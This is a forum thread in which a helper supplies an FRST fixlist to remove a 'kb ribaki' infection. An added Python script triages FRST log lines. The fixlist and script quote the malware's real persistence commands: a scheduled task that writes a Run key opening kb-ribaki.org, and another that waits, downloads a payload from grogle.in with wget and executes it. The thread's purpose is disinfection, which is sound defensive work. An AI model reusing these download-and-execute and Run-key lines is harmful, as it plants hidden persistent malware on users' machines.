Elektroda.pl

[Solved] FRST logs - please interpret regarding kb ribaki

bagnica 19 Feb 2018 00:25 261 2
  • #2 19 Feb 2018 08:00
    krzychupar
    Level 40

    Open Notepad and paste:

    ContextMenuHandlers4: [WinRAR] -> _{B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> No File
    Task: {245FE3E2-0F77-4327-9AD0-EE567CF250FA} - System32\Tasks\{A0A9C16D-9597-471B-AC92-C2380C2AB84C} => C:\Windows\system32\pcalua.exe -a E:\directx\dxsetup.exe -d E:\directx
    Task: {2F57269B-1E09-4E2D-AB1E-B0FDAC7D279C} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
    Task: {4B38DA02-AD61-4A2B-B404-079B32853C59} - System32\Tasks\{8515C219-AF73-4F91-99C2-17CD9415A093} => F:\Autorun.exe
    Task: {4D77BD92-6B08-434A-9D9C-C5192A6AEBDA} - System32\Tasks\Ja => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Ja /t REG_SZ /d "explorer.exe hxxp://kb-ribaki.org" <==== ATTENTION
    Task: {52908C21-FA32-416A-9727-26981E2BEBF2} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> No File <==== ATTENTION
    Task: {9BE8D56A-8BAD-4BAB-91B5-5C389B6C4637} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grogle.in/dat.bmp?data=u4OMKFT23E;camtasia.exe;1446311684 & start cmd /R dat.bmp <==== ATTENTION
    Task: {9FC6D1EA-F58F-43D7-8D1C-C4308696321A} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION
    Task: {AC4E5ACF-89F7-4220-BA21-81EE183975E2} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION
    Task: {CEE64558-E1A7-4D9D-80A7-2001912BE5B5} - \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector -> No File <==== ATTENTION
    Task: {FA2BC0A6-8D4B-458A-85C8-2B8C72487513} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector -> No File <==== ATTENTION
    Hosts:
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
    HKU\S-1-5-21-101499847-300400899-1846284165-1000\...\Run: [Ja] => explorer.exe hxxp://kb-ribaki.org <==== ATTENTION
    HKU\S-1-5-21-101499847-300400899-1846284165-1000\...\MountPoints2: E - E:\Autorun.exe
    HKU\S-1-5-21-101499847-300400899-1846284165-1000\...\MountPoints2: {1577f15a-3fd6-11e3-8af7-1c6f6559f9be} - F:\autorun.exe
    GroupPolicy: Restriction <==== ATTENTION
    Tcpip\..\Interfaces\{11819213-699E-486E-902F-1608347CA3BA}: [DhcpNameServer] 172.20.10.1
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
    SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    Toolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File
    FF HKU\S-1-5-21-101499847-300400899-1846284165-1000\...\Firefox\Extensions: [acewebextension_unlisted@acestream.org] - C:\Users\Ja\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi => not found
    FF Plugin: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll [No File]
    FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [No File]
    FF Plugin HKU\S-1-5-21-101499847-300400899-1846284165-1000: @acestream.net/acestreamplugin,version=3.1.16.1 -> C:\Users\Ja\AppData\Roaming\ACEStream\player\npace_plugin.dll [No File]
    CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
    CHR HKU\S-1-5-21-101499847-300400899-1846284165-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found>
    S2 CTDevice_Srv; C:\Program Files (x86)\Creative\Shared Files\CTDevSrv.exe [X]
    S3 CTUPnPSv; C:\Program Files (x86)\Creative\Creative Centrale\CTUPnPSv.exe [X]
    S3 AndNetDiag; system32\DRIVERS\lgandnetdiag64.sys [X]
    S3 ANDNetModem; system32\DRIVERS\lgandnetmodem64.sys [X]
    S3 IntcAzAudAddService; system32\drivers\RTKVHD64.sys [X]
    EmptyTemp:

    Save the file as fixlist.txt and put it in the folder where you have FRST.exe.
    Run FRST and click Fix.

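An added example from the editor, not code from the thread and not FRST's own logic: a small Python triage script that reads lines in the format quoted in the fixlist above and states why each one is, or is not, a persistence indicator. The regexes, severities and notes are this example's own assumptions about what an analyst checks, and SAMPLE_LOG is constructed from lines posted above so it runs offline. The part worth reading is explain_command_chain, which breaks the "SYSTEM" task's one-liner into its stages: the 300-packet ping is a delay loop, wget fetches a payload that is saved under a .bmp name in ProgramData, and `start cmd /R dat.bmp` runs that file as a batch script.

```python
"""FRST log-line triage. Editor-added example, not code from the thread or from
FRST; patterns, severities and notes are this example's assumptions about what
an analyst checks. SAMPLE_LOG is constructed from lines quoted in the fixlist
above (FRST writes http as hxxp so that URLs are not clickable)."""
import ipaddress
import re
from dataclasses import dataclass, field

# Constructed sample: a subset of the lines quoted in the fixlist above.
SAMPLE_LOG = r"""
Task: {4D77BD92-6B08-434A-9D9C-C5192A6AEBDA} - System32\Tasks\Ja => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Ja /t REG_SZ /d "explorer.exe hxxp://kb-ribaki.org" <==== ATTENTION
Task: {9BE8D56A-8BAD-4BAB-91B5-5C389B6C4637} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp hxxp://grogle.in/dat.bmp?data=u4OMKFT23E;camtasia.exe;1446311684 & start cmd /R dat.bmp <==== ATTENTION
Task: {4B38DA02-AD61-4A2B-B404-079B32853C59} - System32\Tasks\{8515C219-AF73-4F91-99C2-17CD9415A093} => F:\Autorun.exe
Task: {2F57269B-1E09-4E2D-AB1E-B0FDAC7D279C} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-101499847-300400899-1846284165-1000\...\Run: [Ja] => explorer.exe hxxp://kb-ribaki.org <==== ATTENTION
HKU\S-1-5-21-101499847-300400899-1846284165-1000\...\MountPoints2: E - E:\Autorun.exe
Tcpip\..\Interfaces\{11819213-699E-486E-902F-1608347CA3BA}: [DhcpNameServer] 172.20.10.1
S3 IntcAzAudAddService; system32\drivers\RTKVHD64.sys [X]
"""


@dataclass
class Finding:
    severity: str  # "high" | "medium" | "low"
    kind: str
    line: str
    notes: list = field(default_factory=list)


RANK = {"high": 0, "medium": 1, "low": 2}
TASK_RE = re.compile(r"^Task:\s+\{[0-9A-Fa-f-]+\}\s+-\s+(?P<name>.+?)\s+=>\s+(?P<action>.+)$")
RUN_RE = re.compile(r"\\Run:\s+\[(?P<name>[^\]]*)\]\s+=>\s+(?P<cmd>.+)$")
URL_RE = re.compile(r"\b(?:hxxps?|https?)://[^\s\"']+", re.I)
DOWNLOADER_RE = re.compile(r"\b(?:wget|curl|bitsadmin|certutil|powershell|mshta)\b", re.I)
RUN_KEY_RE = re.compile(r"\bREG\s+ADD\s+\S*\\CurrentVersion\\Run\b", re.I)
PING_SLEEP_RE = re.compile(r"\bping\b[^&]*?-n\s+(\d+)", re.I)
REMOVABLE_AUTORUN_RE = re.compile(r"^[D-Z]:\\autorun\.exe$", re.I)
ORPHAN_RE = re.compile(r"-> No File|\[No File\]|\[X\]\s*$|not found", re.I)
DNS_RE = re.compile(r"\[DhcpNameServer\]\s+(\d+\.\d+\.\d+\.\d+)")


def explain_command_chain(action: str) -> list:
    """Split a cmd.exe one-liner on '&' and describe each stage in plain words."""
    body = re.sub(r"^\s*cmd(?:\.exe)?\s+/[cCrRkK]\s+", "", action)  # drop "cmd.exe /c" or "/R"
    steps = []
    for stage in filter(None, (s.strip() for s in body.split("&"))):
        ping = PING_SLEEP_RE.search(stage)
        if ping:  # "ping -n N" against a host that answers is the batch-file sleep idiom
            steps.append(f"sleep ~{int(ping.group(1))}s (ping loop used as a delay)")
        elif DOWNLOADER_RE.search(stage):
            url, out = URL_RE.search(stage), re.search(r"-O\s+(\S+)", stage)
            steps.append(f"download {url.group(0) if url else '?'} to {out.group(1) if out else '?'}")
        elif RUN_KEY_RE.search(stage):
            steps.append("persist via HKCU Run key: " + stage)
        elif re.match(r"start\b", stage, re.I):
            steps.append("execute: " + stage)
        elif re.match(r"cd\b", stage, re.I):
            steps.append("change directory: " + stage)
        else:
            steps.append("other: " + stage)
    return steps


def assess_line(raw: str):
    """Return a Finding for one FRST log line, or None if nothing stands out."""
    line = re.sub(r"\s*<====.*$", "", raw.strip())  # strip FRST's own "<==== ATTENTION" tag
    if not line:
        return None
    if re.search(r"Policies\\Microsoft\\Windows Defender:\s*Restriction", line):
        return Finding("high", "defender-policy-restriction", line,
                       ["Defender policy values exist under HKLM\\SOFTWARE\\Policies; on a home PC nothing legitimate sets them"])
    task = TASK_RE.match(line)
    if task:
        action = task.group("action")
        steps = explain_command_chain(action)
        if URL_RE.search(action) or any(s.startswith(("download", "persist")) for s in steps):
            return Finding("high", "suspicious-scheduled-task", line, steps)
        if REMOVABLE_AUTORUN_RE.match(action):
            return Finding("medium", "task-runs-removable-autorun", line,
                           ["launches Autorun.exe from a removable drive letter; remove unless the media is known"])
        return None  # task with an ordinary action: nothing to report
    run = RUN_RE.search(line)
    if run and URL_RE.search(run.group("cmd")):
        return Finding("high", "run-key-launches-url", line,
                       [f"logon entry '{run.group('name')}' opens {URL_RE.search(run.group('cmd')).group(0)}"])
    if "MountPoints2:" in line and re.search(r"autorun\.exe", line, re.I):
        return Finding("medium", "mountpoints2-autorun", line, ["stale autorun handler for removable media; clear it"])
    dns = DNS_RE.search(line)
    if dns and not ipaddress.ip_address(dns.group(1)).is_private:
        return Finding("medium", "public-dhcp-dns", line, [f"resolver {dns.group(1)} is not a private address; check for DNS hijacking"])
    if ORPHAN_RE.search(line):
        return Finding("low", "orphan-entry", line, ["points at a file that no longer exists; cleanup only"])
    return None


def triage(log_text: str) -> list:
    """All findings for a log, most severe first (sort is stable, so log order is kept within a level)."""
    found = [f for f in map(assess_line, log_text.splitlines()) if f]
    found.sort(key=lambda f: RANK[f.severity])
    return found
```

Calling `triage(SAMPLE_LOG)` yields four high findings (both command-running tasks, the Defender policy restriction and the Run entry that opens kb-ribaki.org), two medium ones (the autorun task and the MountPoints2 leftover) and two low orphan entries; the DhcpNameServer line produces nothing because 172.20.10.1 is a private address, whereas a public resolver handed out by DHCP would be flagged for DNS hijacking.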
  • #3 6 May 2018 10:18
    bagnica
    Level 5

    Running FRST with the log above cleaned the computer up nicely :)
